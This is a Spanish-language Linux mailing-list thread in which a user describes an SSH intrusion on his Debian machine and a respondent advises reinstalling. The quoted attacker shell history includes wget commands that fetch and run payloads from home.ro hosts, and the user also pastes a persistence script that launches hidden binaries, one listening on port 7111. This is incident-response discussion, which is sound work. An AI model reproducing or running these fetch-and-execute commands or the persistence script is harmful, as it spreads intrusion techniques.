Si te modificaron el sshd.conf quiere decir que tuvieron acceso root al server, con lo cual estas muy complicado. A mi modo de ver las cosas la forma de solucionar eso es reinstalar el sistema desde cero; ahora bien para fines educativos seria interesante poder analizar el sistema para ver que es lo que han hecho y como. Saludos. Nekrodamus
> Hola todos, > Les queria hacer una consulta ya que haces unas dias me entraron a mi pc > que tenia y tiene linux, la cual normalmente esta encendida las 24hs con > un Adsl. Tiene corriendo un Debian Woody que cada dos aprox. le hago un > apt-get upgrade. > Ingresaron por el sshd, me cambiaron a protocolo 1 y me modificaron el > .conf > > Les muestro lo q instalaron. > > Este es el historico del usuario q usaron: > ---------------------------------------------------------------- > uname -a > wget jhonyboy.home.ro/t.tgz > rm -rf no_user.phtml > cd .ssh > cd > cd .ssh > id > wget netpunk.home.ro/t.tgz > tar -zvf t.tgz > ./t > tar -xzvf t.tgz > ./t > wget jhonyboy.home.ro/ups > chmod +x ups > ./ups > ls > ./ups > ----------------------------------------------------------------------------------- > Esto me generaba muchos muchos procesos, q parecian estar muertos, los > cuales utilizaban: > > C�digo de programa Archivo regular 16516 288523 > /usr/X11R6/.zk/echo > Biblioteca compartida Archivo regular 90210 159640 /lib/ld-2.2.5.so > > Biblioteca compartida Archivo regular 1153784 159648 /lib/libc-2.2.5.so > 3r > Archivo regular 179 225596 /etc/sysconfig/console/load.zk > Archivo regular 16516 288523 /usr/X11R6/.zk/echo > --------------------------------------------------------------------------------------------- > Script: > ************************************************************** > linux:/etc/sysconfig/console# ll > total 4 > -rwxr-xr-x 1 root root 179 Jun 1 11:18 load.zk > linux:/etc/sysconfig/console# cat load.zk > #!/bin/sh > # Script used by the kernel init interface > export LOGIN=ZK > /usr/bin/run /usr/X11R6/.zk/echo >> /dev/null 2>&1 > /usr/bin/run /usr/X11R6/.zk/xfs -p 7111 >> /dev/null 2>&1 > linux:/etc/sysconfig/console# > ************************************************************ > Aclaro q tenia abierto un port (xfs, q lo generaba este script ) q > realmente no recuerdo. > Ahora elimine todos los scripts pero no habia forma de matar los > procesos ya q arrancaban de nuevo, en la consulta al pid mostraba q los > scripts estaban "Delet"-> ya q los elimine yo, ademas de estos, tambien > llamaban a libc-2.2.5.so y ld-2.2.5.so , los cuales no puedo eliminar. > La pregunta puede ser que modificaron libc y ld ? > De q fomar se puede solucionar sin pisarlo al Linux ?, en este caso > mucho problema no hay por q era una pc comun, pero en el caso de algun > server con dias y dias de laburo sobre el...? > > Muchas Gracias a Todos! > Saludos > Francisco. > > FGG > [EMAIL PROTECTED] > > > -- > Para desuscribirte ten�s que visitar la p�gina > https://listas.linux.org.ar/mailman/listinfo/lugar-gral/ > > Si ten�s alg�n inconveniente o consulta escrib� a > mailto:[EMAIL PROTECTED] > Apoya al ASLE enviando tu firma http://www.linux.org.ar/asle > > ============================================================================= http://www.interlap.com.ar - Tu Email POP3. http://www.interlap.com.ar/premium - Email POP3 Premium a solo $36 Anuales. http://www.interlap.com.ar/acceso - Accede Gratis a Internet. http://www.interlap.com.ar/webhosting - Alojamiento web desde $ 20 Mensuales. ============================================================================= -- Para desuscribirte ten�s que visitar la p�gina https://listas.linux.org.ar/mailman/listinfo/lugar-gral/ Si ten�s alg�n inconveniente o consulta escrib� a mailto:[EMAIL PROTECTED] Apoya al ASLE enviando tu firma http://www.linux.org.ar/asle
